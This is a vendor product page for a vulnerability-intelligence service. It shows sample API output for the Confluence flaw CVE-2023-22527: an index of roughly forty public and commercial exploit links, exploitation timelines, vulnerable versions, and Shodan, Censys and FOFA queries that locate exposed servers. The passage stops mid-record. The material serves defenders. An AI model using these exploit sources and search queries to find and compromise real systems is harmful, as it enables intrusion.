VulnCheck For Government
Government agencies see more with VulnCheck
Partnered with mission-focused organizations
Exploit & Vulnerability Intelligence
Leverage Exploit & Vulnerability Intelligence to make better decisions on which vulnerabilities need immediate remediation.
- VulnCheck KEV indexes 4,205 exploited in-the-wild vulnerabilities vs. 1,436 in CISA KEV (192.83% more) and VulnCheck notifies users days, months and even years earlier than CISA
- Tracking of 5x more exploits than Exploit-DB's 43,590 & at least 1 exploit for 31.4% of CVEs (vs. 12.9% in Exploit-DB)
- Cached copies and git history of all archived exploit code
GET /v3/index/exploits?cve=CVE-2023-22527
[
{
"id": "CVE-2023-22527",
"public_exploit_found": true,
"commercial_exploit_found": true,
"weaponized_exploit_found": true,
"max_exploit_maturity": "weaponized",
"reported_exploited_by_honeypot_service": true,
"reported_exploited_by_vulncheck_canaries": false,
"reported_exploited": true,
"reported_exploited_by_threat_actors": true,
"reported_exploited_by_ransomware": true,
"reported_exploited_by_botnets": true,
"inKEV": true,
"inVCKEV": true,
"timeline": {
"nvd_published": "2024-01-16T05:15:08.29Z",
"nvd_last_modified": "2025-02-09T20:50:17.667Z",
"first_exploit_published": "2024-01-19T00:00:00Z",
"first_exploit_published_weaponized_or_higher": "2024-01-22T00:00:00Z",
"most_recent_exploit_published": "2025-05-19T00:00:00Z",
"first_reported_threat_actor": "2024-01-19T00:00:00Z",
"most_recent_reported_threat_actor": "2025-10-09T00:00:00Z",
"first_reported_ransomware": "2024-03-07T00:00:00Z",
"most_recent_reported_ransomware": "2025-05-05T00:00:00Z",
"first_reported_botnet": "2024-03-20T00:00:00Z",
"most_recent_reported_botnet": "2025-07-17T00:00:00Z",
"cisa_kev_date_added": "2024-01-24T00:00:00Z",
"cisa_kev_date_due": "2024-02-14T00:00:00Z",
"vulncheck_kev_date_added": "2024-01-19T00:00:00Z",
"vulncheck_kev_date_due": "2024-02-14T00:00:00Z"
},
"trending": {
"github": false
},
"epss": {
"epss_score": 0.94316,
"epss_percentile": 0.99944,
"last_modified": "2025-10-06T13:40:10.389902143Z"
},
"counts": {
"exploits": 40,
"threat_actors": 3,
"botnets": 3,
"ransomware_families": 2
},
"exploits": [
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/remote-exploits/39278.txt",
"name": "Atlassian Confluence SSTI Injection Exploit",
"refsource": "0day.today",
"date_added": "2024-01-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/web-applications/39469.txt",
"name": "Atlassian Confluence < 8.5.3 - Remote Code Execution Exploit",
"refsource": "0day.today",
"date_added": "2024-03-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/",
"name": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://attackerkb.com/topics/wONJMCgCgl/cve-2023-22527",
"name": "CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://boogipop.com/2024/02/13/Atlassian%20Confluence%20CVE-2023-22527%20%E5%88%86%E6%9E%90%E5%8F%8A%E6%AD%A6%E5%99%A8%E5%8C%96%E5%AE%9E%E7%8E%B0/",
"name": "Atlassian Confluence CVE-2023-22527 分析及武器化实现",
"refsource": "blogs",
"date_added": "2024-02-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://vulncheck.com/blog/confluence-dreams-of-shells",
"name": "Does Confluence Dream of Shells?",
"refsource": "blogs",
"date_added": "2024-03-08T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.labs.greynoise.io/grimoire/2024-03-confluence-where-are-they-now/",
"name": "Where are they now? Starring: Confluence CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-03-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/pwning-confluence-via-ognl-injection-for-fun-and-learning-cve-2023-22527",
"name": "Pwning Confluence via OGNL Injection for fun and learning - CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-04-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/automated-pwning-confluence-via-ognl-injection-cve-2023-22527",
"name": "Automated pwning Confluence via OGNL Injection (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-06-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html",
"name": "Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence",
"refsource": "blogs",
"date_added": "2024-08-30T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware",
"refsource": "blogs",
"date_added": "2025-05-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.coresecurity.com/core-labs/exploits",
"name": "Atlassian Confluence text-inline OGNL Injection Vulnerability Exploit",
"refsource": "coreimpact",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available"
},
{
"url": "https://github.com/Drun1baby/CVE-2023-22527",
"name": "Drun1baby/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Drun1baby/CVE-2023-22527/main/PoC.txt",
"clone_ssh_url": "git@github.com:Drun1baby/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Drun1baby/CVE-2023-22527.git"
},
{
"url": "https://github.com/cleverg0d/CVE-2023-22527",
"name": "cleverg0d/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/cleverg0d/CVE-2023-22527/main/README.md",
"clone_ssh_url": "git@github.com:cleverg0d/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/cleverg0d/CVE-2023-22527.git"
},
{
"url": "https://github.com/thanhlam-attt/CVE-2023-22527",
"name": "thanhlam-attt/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/thanhlam-attt/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:thanhlam-attt/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/thanhlam-attt/CVE-2023-22527.git"
},
{
"url": "https://github.com/C1ph3rX13/CVE-2023-22527",
"name": "C1ph3rX13/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22527/main/CVE-2023-22527.go",
"clone_ssh_url": "git@github.com:C1ph3rX13/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/C1ph3rX13/CVE-2023-22527.git"
},
{
"url": "https://github.com/Chocapikk/CVE-2023-22527",
"name": "Chocapikk/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Chocapikk/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:Chocapikk/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Chocapikk/CVE-2023-22527.git"
},
{
"url": "https://github.com/Manh130902/CVE-2023-22527-POC",
"name": "Manh130902/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Manh130902/CVE-2023-22527-POC/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Manh130902/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Manh130902/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/Niuwoo/CVE-2023-22527",
"name": "Niuwoo/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Niuwoo/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Niuwoo/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Niuwoo/CVE-2023-22527.git"
},
{
"url": "https://github.com/RevoltSecurities/CVE-2023-22527",
"name": "RevoltSecurities/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/RevoltSecurities/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:RevoltSecurities/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/RevoltSecurities/CVE-2023-22527.git"
},
{
"url": "https://github.com/VNCERT-CC/CVE-2023-22527-confluence",
"name": "VNCERT-CC/CVE-2023-22527-confluence exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/VNCERT-CC/CVE-2023-22527-confluence/main/exploit-CVE-2023-22527.js",
"clone_ssh_url": "git@github.com:VNCERT-CC/CVE-2023-22527-confluence.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/VNCERT-CC/CVE-2023-22527-confluence.git"
},
{
"url": "https://github.com/Vozec/CVE-2023-22527",
"name": "Vozec/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Vozec/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Vozec/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Vozec/CVE-2023-22527.git"
},
{
"url": "https://github.com/Privia-Security/CVE-2023-22527",
"name": "Privia-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Privia-Security/CVE-2023-22527/main/main.go",
"clone_ssh_url": "git@github.com:Privia-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Privia-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/yoryio/CVE-2023-22527",
"name": "yoryio/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/yoryio/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:yoryio/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/yoryio/CVE-2023-22527.git"
},
{
"url": "https://github.com/MaanVader/CVE-2023-22527-POC",
"name": "MaanVader/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/MaanVader/CVE-2023-22527-POC/master/exploit.py",
"clone_ssh_url": "git@github.com:MaanVader/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/MaanVader/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/adminlove520/CVE-2023-22527",
"name": "adminlove520/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/adminlove520/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:adminlove520/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/adminlove520/CVE-2023-22527.git"
},
{
"url": "https://github.com/YongYe-Security/CVE-2023-22527",
"name": "YongYe-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-02T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/YongYe-Security/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:YongYe-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/YongYe-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL",
"name": "Boogipop/CVE-2023-22527-Godzilla-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-11T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL/main/src/main/Main.java",
"clone_ssh_url": "git@github.com:Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git"
},
{
"url": "https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL",
"name": "M0untainShley/CVE-2023-22527-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/M0untainShley/CVE-2023-22527-MEMSHELL/master/src/main/Main.java",
"clone_ssh_url": "git@github.com:M0untainShley/CVE-2023-22527-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/M0untainShley/CVE-2023-22527-MEMSHELL.git"
},
{
"url": "https://github.com/vulncheck-oss/cve-2023-22527",
"name": "vulncheck-oss/cve-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-03-04T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/vulncheck-oss/cve-2023-22527/main/README.md?token=GHSAT0AAAAAACO2HCW4FJ4YNPSHC4TPP4AUZPHLNSQ",
"clone_ssh_url": "git@github.com:vulncheck-oss/cve-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/vulncheck-oss/cve-2023-22527.git"
},
{
"url": "https://github.com/BBD-YZZ/Confluence-RCE",
"name": "BBD-YZZ/Confluence-RCE exploit repository",
"refsource": "github-exploits",
"date_added": "2024-05-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/BBD-YZZ/Confluence-RCE/master/pocs/CVE_2023_22527.py",
"clone_ssh_url": "git@github.com:BBD-YZZ/Confluence-RCE.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/BBD-YZZ/Confluence-RCE.git"
},
{
"url": "https://github.com/kh4sh3i/CVE-2023-22527",
"name": "kh4sh3i/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-06T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/kh4sh3i/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:kh4sh3i/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/kh4sh3i/CVE-2023-22527.git"
},
{
"url": "https://github.com/AxthonyV/CVE-2023-22527",
"name": "AxthonyV/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-07T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/AxthonyV/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:AxthonyV/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/AxthonyV/CVE-2023-22527.git"
},
{
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "metasploit",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2023/CVE-2023-22527.yaml",
"name": "Atlassian Confluence - Remote Code Execution",
"refsource": "nuclei-templates",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "packetstorm",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/177643/Atlassian-Confluence-8.5.3-Remote-Code-Execution.html",
"name": "Atlassian Confluence 8.5.3 Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-03-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/179520/Confluence-Template-Injection-Remote-Code-Execution.html",
"name": "Confluence Template Injection Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-07-15T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://api.vulncheck.com/v3/index/initial-access?cve=CVE-2023-22527",
"name": "Confluence Template Injection (text-inline.vm)",
"refsource": "vulncheck-initial-access",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available",
"exploit_type": "initial-access",
"clone_ssh_url": "git@git.vulncheck.com:vulncheck/initial-access.git"
},
{
"url": "https://x.com/ptswarm/status/1748331385968795882",
"name": "We have reproduced CVE-2023-22527 in Atlassian Confluence",
"refsource": "x",
"date_added": "2024-01-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "privately-available"
}
],
"reported_exploitation": [
{
"url": "https://www.ptsecurity.com/ru-ru/research/analytics/itogi-proektov-po-rassledovaniyu-inczidentov-i-retrospektivnomu-analizu-2023-2024/#id1",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-11-06T00:00:00Z"
},
{
"url": "https://www4.orangecyberdefense.com/security-navigator-2025-en",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-12-05T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-24T00:00:00Z"
},
{
"url": "https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-27T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-05-19T00:00:00Z"
},
{
"url": "https://app.crowdsec.net/cti/cve-explorer/CVE-2023-22527",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-06-07T00:00:00Z"
},
{
"url": "https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-10-09T00:00:00Z"
}
],
"date_added": "2024-01-19T00:00:00Z",
"_timestamp": "2025-10-10T08:49:45.954951346Z"
}
]
Initial Access Intelligence
Initial Access Intelligence provides organizations the detection artifacts, such as Suricata signatures, YARA rules, PCAPs, and private exploit PoCs, to defend against initial access vulnerabilities, already exploited or likely to be soon.
- In-house developed proprietary exploit code (including bypass techniques) and detections (PCAPs, Suricata & Snort rules, YARA rules, Sigma rules, etc.)
- Custom Shodan, Censys, FOFA, ZoomEye, & GreyNoise queries to find potentially impacted devices
- VulnCheck for Government SLA commits to covering at least 200 new vulnerabilities per year with proprietary exploit code & detection artifacts
GET /v3/index/initial-access?cve=CVE-2023-22527
[
{
"cve": "CVE-2023-22527",
"inKEV": true,
"inVCKEV": true,
"vulnerable_cpes": [
"cpe:2.3:a:atlassian:confluence_data_center:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.3:*:*:*:*:*:*:*"
],
"artifacts": [
{
"vendor": "Confluence",
"targetEncryptedComms": "either",
"mitreAttackTechniques": [
"T1190"
],
"product": [
"Confluence Server",
"Confluence Data Center"
],
"dateAdded": "2024-01-22T00:00:00Z",
"artifactName": "Confluence Template Injection (text-inline.vm)",
"exploit": true,
"versionScanner": true,
"pcap": true,
"sigmaRule": false,
"suricataRule": true,
"snortRule": true,
"yara": true,
"nmapScript": true,
"zeroday": false,
"targetService": "HTTP",
"targetDocker": true,
"googleQueries": [],
"googleRawQueries": [],
"baiduQueries": [
"https://www.baidu.com/s?wd=intitle%3A%22Log%20In%20-%20Confluence%22"
],
"baiduRawQueries": [
"intitle:\"Log In - Confluence\""
],
"shodanQueries": [
"https://www.shodan.io/search?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22JSESSIONID%22+%2Bhtml%3A%22atlassian-authentication-plugin%22+-%22145DF9C4CDE560B2699212692B867CDA%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22Set-Cookie%3A+JSESSIONID%22+%2Bhtml%3A%22SAML+POST+Binding%22"
],
"censysQueries": [
"https://platform.censys.io/search?q=host.services%3A%28endpoints.http.favicons.hash_md5%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22%20and%20banner%3A%22Set-Cookie%3A%20JSESSIONID%22%20and%20banner%3A%22X-Confluence-Request-Time%22%20and%20endpoints.http.body%3A%22confluence-context-path%22%29"
],
"censysLegacyQueries": [
"https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.favicons.md5_hash%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22+and+services.banner%3A%22Set-Cookie%3A+JSESSIONID%22+and+services.banner%3A%22X-Confluence-Request-Time%22+and+services.http.response.body%3A%22confluence-context-path%22%29"
],
"driftnetQueries": [],
"driftnetRawQueries": [],
"greynoiseQueries": [
"https://viz.greynoise.io/query?gnql=raw_data.web.paths%3A%22%2Ftemplate%2Faui%2Ftext-inline.vm%22",
"https://viz.greynoise.io/tag/atlassian-confluence-template-injection-rce-attempt-cve-2023-22527"
],
"fofaQueries": [
"https://en.fofa.info/result?qbase64=aGVhZGVyPSJTZXQtQ29va2llOiBKU0VTU0lPTklEIiAmJiBoZWFkZXI9IlgtQ29uZmx1ZW5jZS1SZXF1ZXN0LVRpbWUiICYmIGJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uX2hhc2g9Ii0zMDUxNzkzMTIi"
],
"fofaRawQueries": [
